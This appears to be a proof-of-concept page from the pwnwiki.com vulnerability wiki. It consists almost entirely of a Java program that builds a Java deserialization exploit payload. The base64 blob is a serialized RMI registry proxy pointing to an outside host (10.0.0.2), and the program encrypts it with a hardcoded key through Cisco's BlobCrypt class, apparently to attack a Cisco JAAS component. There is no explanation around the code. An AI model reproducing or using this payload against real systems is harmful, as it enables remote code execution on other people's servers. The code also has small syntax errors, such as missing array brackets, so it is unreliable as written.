PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
POC
import java.security.InvalidKeyException;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;
public class JaasEncryptor {
public static void main(String args) {
String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
byte payload = Base64.getDecoder().decode(b64Payload);
byte key = new byte{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
byte enc = BlobCrypt.encryptArray(payload, key);
System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
byte dec = BlobCrypt.decryptArray(enc, key);
}
}
免费、自由、人人可编辑的漏洞库--pwnwiki.com
